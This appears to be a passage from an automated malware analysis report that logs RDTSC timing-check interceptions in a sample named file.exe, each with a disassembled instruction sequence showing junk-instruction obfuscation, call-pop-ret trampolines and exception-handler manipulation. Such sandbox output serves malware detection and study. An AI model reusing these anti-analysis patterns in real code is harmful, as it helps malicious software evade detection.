              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FD242 second address: 6FD246 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FE0B4 second address: 6FE0BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF280 second address: 6FF31A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007FCE8882CE27h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d push eax 0x0000000e push ecx 0x0000000f jmp 00007FCE8882CE25h 0x00000014 pop ecx 0x00000015 nop 0x00000016 mov esi, dword ptr [ebp+122D227Dh] 0x0000001c pushad 0x0000001d mov dx, di 0x00000020 popad 0x00000021 push 00000000h 0x00000023 push 00000000h 0x00000025 push ebp 0x00000026 call 00007FCE8882CE18h 0x0000002b pop ebp 0x0000002c mov dword ptr [esp+04h], ebp 0x00000030 add dword ptr [esp+04h], 00000017h 0x00000038 inc ebp 0x00000039 push ebp 0x0000003a ret 0x0000003b pop ebp 0x0000003c ret 0x0000003d xor edi, dword ptr [ebp+122D377Ah] 0x00000043 add dword ptr [ebp+122D19DDh], edx 0x00000049 push 00000000h 0x0000004b jmp 00007FCE8882CE1Ch 0x00000050 xchg eax, ebx 0x00000051 push eax 0x00000052 push edx 0x00000053 jp 00007FCE8882CE29h 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF31A second address: 6FF342 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88C945E1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FCE88C945DFh 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6FF342 second address: 6FF35F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FCE8882CE25h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 701362 second address: 70136D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FCE88C945D6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703F8F second address: 703F95 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703F95 second address: 703F99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 703F99 second address: 704020 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov dword ptr [esp], eax 0x0000000e push 00000000h 0x00000010 push edi 0x00000011 call 00007FCE8882CE18h 0x00000016 pop edi 0x00000017 mov dword ptr [esp+04h], edi 0x0000001b add dword ptr [esp+04h], 0000001Bh 0x00000023 inc edi 0x00000024 push edi 0x00000025 ret 0x00000026 pop edi 0x00000027 ret 0x00000028 push 00000000h 0x0000002a jmp 00007FCE8882CE29h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007FCE8882CE18h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Ch 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b movzx edi, cx 0x0000004e push eax 0x0000004f push eax 0x00000050 push edx 0x00000051 js 00007FCE8882CE1Ch 0x00000057 push eax 0x00000058 push edx 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704020 second address: 704024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 704024 second address: 70402A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70402A second address: 70402E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709862 second address: 709866 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709A26 second address: 709A2C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709A2C second address: 709A31 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70B88F second address: 70B899 instructions: 0x00000000 rdtsc 0x00000002 jne 00007FCE88C945D6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70A9E1 second address: 70AA90 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FCE8882CE16h 0x0000000a popad 0x0000000b popad 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edi 0x00000010 call 00007FCE8882CE18h 0x00000015 pop edi 0x00000016 mov dword ptr [esp+04h], edi 0x0000001a add dword ptr [esp+04h], 0000001Ch 0x00000022 inc edi 0x00000023 push edi 0x00000024 ret 0x00000025 pop edi 0x00000026 ret 0x00000027 xor dword ptr [ebp+122D2607h], eax 0x0000002d jnl 00007FCE8882CE1Ch 0x00000033 push dword ptr fs:[00000000h] 0x0000003a push 00000000h 0x0000003c push ebx 0x0000003d call 00007FCE8882CE18h 0x00000042 pop ebx 0x00000043 mov dword ptr [esp+04h], ebx 0x00000047 add dword ptr [esp+04h], 00000018h 0x0000004f inc ebx 0x00000050 push ebx 0x00000051 ret 0x00000052 pop ebx 0x00000053 ret 0x00000054 mov dword ptr fs:[00000000h], esp 0x0000005b mov ebx, dword ptr [ebp+122D1ACFh] 0x00000061 mov eax, dword ptr [ebp+122D0691h] 0x00000067 jmp 00007FCE8882CE1Eh 0x0000006c push FFFFFFFFh 0x0000006e jbe 00007FCE8882CE1Ch 0x00000074 mov dword ptr [ebp+122D18E8h], ecx 0x0000007a nop 0x0000007b jmp 00007FCE8882CE1Ah 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 jnp 00007FCE8882CE18h 0x00000089 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 709A31 second address: 709A37 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70AA90 second address: 70AAA4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE8882CE1Fh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70BB66 second address: 70BB6C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D89C second address: 70D8A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D8A2 second address: 70D8B5 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 je 00007FCE88C945D6h 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push esi 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D8B5 second address: 70D8C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push esi 0x00000006 jns 00007FCE8882CE16h 0x0000000c jg 00007FCE8882CE16h 0x00000012 pop esi 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70D8C8 second address: 70D8D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push edx 0x00000008 pop edx 0x00000009 popad 0x0000000a push ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED8E second address: 70ED92 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70E0A0 second address: 70E0A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 70ED92 second address: 70EE0F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE8882CE1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a pushad 0x0000000b popad 0x0000000c push edx 0x0000000d pop edx 0x0000000e popad 0x0000000f popad 0x00000010 push eax 0x00000011 jnl 00007FCE8882CE22h 0x00000017 nop 0x00000018 push 00000000h 0x0000001a push edx 0x0000001b call 00007FCE8882CE18h 0x00000020 pop edx 0x00000021 mov dword ptr [esp+04h], edx 0x00000025 add dword ptr [esp+04h], 00000019h 0x0000002d inc edx 0x0000002e push edx 0x0000002f ret 0x00000030 pop edx 0x00000031 ret 0x00000032 mov di, bx 0x00000035 mov di, dx 0x00000038 push 00000000h 0x0000003a mov edi, dword ptr [ebp+122D35AEh] 0x00000040 add ebx, dword ptr [ebp+1244D97Bh] 0x00000046 push 00000000h 0x00000048 mov edi, 10A1DE07h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 pushad 0x00000051 pushad 0x00000052 popad 0x00000053 jmp 00007FCE8882CE1Fh 0x00000058 popad 0x00000059 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 711EAB second address: 711EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712CEC second address: 712CF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712CF0 second address: 712CF6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712CF6 second address: 712D18 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE1Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007FCE887ECE1Ch 0x00000012 jbe 00007FCE887ECE16h 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712D18 second address: 712D30 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FCE88BA0313h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712D30 second address: 712D51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 mov bh, dl 0x0000000a push 00000000h 0x0000000c sub dword ptr [ebp+122D24EAh], eax 0x00000012 push 00000000h 0x00000014 mov bh, 7Ah 0x00000016 xchg eax, esi 0x00000017 jbe 00007FCE887ECE20h 0x0000001d push eax 0x0000001e push edx 0x0000001f pushad 0x00000020 popad 0x00000021 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713D25 second address: 713D2B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713D2B second address: 713DB2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE887ECE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d jnp 00007FCE887ECE26h 0x00000013 nop 0x00000014 adc di, A61Ah 0x00000019 push 00000000h 0x0000001b jmp 00007FCE887ECE26h 0x00000020 push 00000000h 0x00000022 push 00000000h 0x00000024 push esi 0x00000025 call 00007FCE887ECE18h 0x0000002a pop esi 0x0000002b mov dword ptr [esp+04h], esi 0x0000002f add dword ptr [esp+04h], 00000018h 0x00000037 inc esi 0x00000038 push esi 0x00000039 ret 0x0000003a pop esi 0x0000003b ret 0x0000003c xchg eax, esi 0x0000003d push ebx 0x0000003e jmp 00007FCE887ECE1Ch 0x00000043 pop ebx 0x00000044 push eax 0x00000045 pushad 0x00000046 jmp 00007FCE887ECE1Ah 0x0000004b pushad 0x0000004c ja 00007FCE887ECE16h 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715D5C second address: 715DAB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 jne 00007FCE88BA031Ch 0x0000000c nop 0x0000000d add edi, 2E9CDB35h 0x00000013 push 00000000h 0x00000015 jno 00007FCE88BA030Ch 0x0000001b mov dword ptr [ebp+1244D185h], edi 0x00000021 push 00000000h 0x00000023 movsx ebx, bx 0x00000026 mov dword ptr [ebp+122D203Ah], edx 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 pop eax 0x00000033 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713F24 second address: 713F2A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 712F1B second address: 712F25 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88BA030Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 714F4C second address: 714F51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715DAB second address: 715DB5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88BA0306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 713F2A second address: 713F3F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE1Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d push ebx 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715DB5 second address: 715DBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715DBB second address: 715DBF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716E2E second address: 716E32 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 715F06 second address: 715F11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FCE887ECE16h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716E32 second address: 716E38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717D83 second address: 717E0E instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FCE887ECE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FCE887ECE22h 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov dword ptr [ebp+122D22E0h], ecx 0x00000019 mov ebx, dword ptr [ebp+122D1E0Fh] 0x0000001f push 00000000h 0x00000021 push 00000000h 0x00000023 push ebp 0x00000024 call 00007FCE887ECE18h 0x00000029 pop ebp 0x0000002a mov dword ptr [esp+04h], ebp 0x0000002e add dword ptr [esp+04h], 0000001Ah 0x00000036 inc ebp 0x00000037 push ebp 0x00000038 ret 0x00000039 pop ebp 0x0000003a ret 0x0000003b jmp 00007FCE887ECE1Eh 0x00000040 push 00000000h 0x00000042 push 00000000h 0x00000044 push edi 0x00000045 call 00007FCE887ECE18h 0x0000004a pop edi 0x0000004b mov dword ptr [esp+04h], edi 0x0000004f add dword ptr [esp+04h], 00000014h 0x00000057 inc edi 0x00000058 push edi 0x00000059 ret 0x0000005a pop edi 0x0000005b ret 0x0000005c xor dword ptr [ebp+122D2816h], ebx 0x00000062 push eax 0x00000063 pushad 0x00000064 push esi 0x00000065 pushad 0x00000066 popad 0x00000067 pop esi 0x00000068 pushad 0x00000069 push eax 0x0000006a push edx 0x0000006b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FD5 second address: 716FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FD9 second address: 716FDF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 716FDF second address: 717086 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE88BA030Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], eax 0x0000000c mov edi, dword ptr [ebp+122D354Ah] 0x00000012 push dword ptr fs:[00000000h] 0x00000019 movsx edi, ax 0x0000001c mov dword ptr fs:[00000000h], esp 0x00000023 push 00000000h 0x00000025 push esi 0x00000026 call 00007FCE88BA0308h 0x0000002b pop esi 0x0000002c mov dword ptr [esp+04h], esi 0x00000030 add dword ptr [esp+04h], 0000001Ah 0x00000038 inc esi 0x00000039 push esi 0x0000003a ret 0x0000003b pop esi 0x0000003c ret 0x0000003d jmp 00007FCE88BA0315h 0x00000042 mov eax, dword ptr [ebp+122D0145h] 0x00000048 mov ebx, dword ptr [ebp+1244D185h] 0x0000004e sub ebx, dword ptr [ebp+122D377Ah] 0x00000054 push FFFFFFFFh 0x00000056 push 00000000h 0x00000058 push eax 0x00000059 call 00007FCE88BA0308h 0x0000005e pop eax 0x0000005f mov dword ptr [esp+04h], eax 0x00000063 add dword ptr [esp+04h], 0000001Ah 0x0000006b inc eax 0x0000006c push eax 0x0000006d ret 0x0000006e pop eax 0x0000006f ret 0x00000070 mov edi, dword ptr [ebp+122D34FEh] 0x00000076 nop 0x00000077 pushad 0x00000078 pushad 0x00000079 jng 00007FCE88BA0306h 0x0000007f push eax 0x00000080 push edx 0x00000081 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717086 second address: 7170A5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FCE887ECE28h 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 718BF4 second address: 718BFA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717F8E second address: 717FE3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b push 00000000h 0x0000000d push esi 0x0000000e call 00007FCE887ECE18h 0x00000013 pop esi 0x00000014 mov dword ptr [esp+04h], esi 0x00000018 add dword ptr [esp+04h], 0000001Ah 0x00000020 inc esi 0x00000021 push esi 0x00000022 ret 0x00000023 pop esi 0x00000024 ret 0x00000025 push dword ptr fs:[00000000h] 0x0000002c mov dword ptr fs:[00000000h], esp 0x00000033 mov ebx, 2E070E4Eh 0x00000038 mov eax, dword ptr [ebp+122D08E5h] 0x0000003e push FFFFFFFFh 0x00000040 mov dword ptr [ebp+122D1D46h], edx 0x00000046 nop 0x00000047 push eax 0x00000048 push edx 0x00000049 push eax 0x0000004a push edx 0x0000004b pushad 0x0000004c popad 0x0000004d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7170A5 second address: 7170B5 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FCE88BA0306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c push esi 0x0000000d push ecx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717FE3 second address: 717FED instructions: 0x00000000 rdtsc 0x00000002 jng 00007FCE887ECE16h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717FED second address: 717FFF instructions: 0x00000000 rdtsc 0x00000002 jg 00007FCE88BA0308h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 717FFF second address: 718006 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719BE0 second address: 719BEA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FCE88BA0306h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6C71C0 second address: 6C71C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 719DE0 second address: 719DE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723047 second address: 72305E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE1Dh 0x00000007 jc 00007FCE887ECE16h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231A2 second address: 7231B9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88BA0313h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7231B9 second address: 723214 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FCE887ECE1Fh 0x0000000b jl 00007FCE887ECE1Eh 0x00000011 pushad 0x00000012 popad 0x00000013 ja 00007FCE887ECE16h 0x00000019 pushad 0x0000001a push esi 0x0000001b pop esi 0x0000001c pushad 0x0000001d popad 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 push edx 0x00000022 push edi 0x00000023 jmp 00007FCE887ECE1Bh 0x00000028 pop edi 0x00000029 push eax 0x0000002a push edx 0x0000002b jmp 00007FCE887ECE23h 0x00000030 jmp 00007FCE887ECE1Dh 0x00000035 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 723214 second address: 723220 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jp 00007FCE88BA0306h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72338B second address: 72338F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 7234BF second address: 7234DE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FCE88BA0317h 0x00000009 popad 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727D11 second address: 727D1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 jnl 00007FCE887ECE16h 0x0000000d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E4C second address: 727E51 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E51 second address: 727E57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E57 second address: 727E5B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E5B second address: 727E9C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FCE887ECE24h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FCE887ECE29h 0x00000011 mov eax, dword ptr [esp+04h] 0x00000015 jnc 00007FCE887ECE1Eh 0x0000001b push esi 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727E9C second address: 727EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov eax, dword ptr [eax] 0x00000007 push eax 0x00000008 push edx 0x00000009 ja 00007FCE88BA030Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EAD second address: 727EB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EB1 second address: 727EC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FCE88BA0314h 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 727EC9 second address: 727ECD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 72F8C8 second address: 72F8D2 instructions: 0x00000000 rdtsc 0x00000002 jc 00007FCE88BA0306h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 6BB686 second address: 6BB68C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
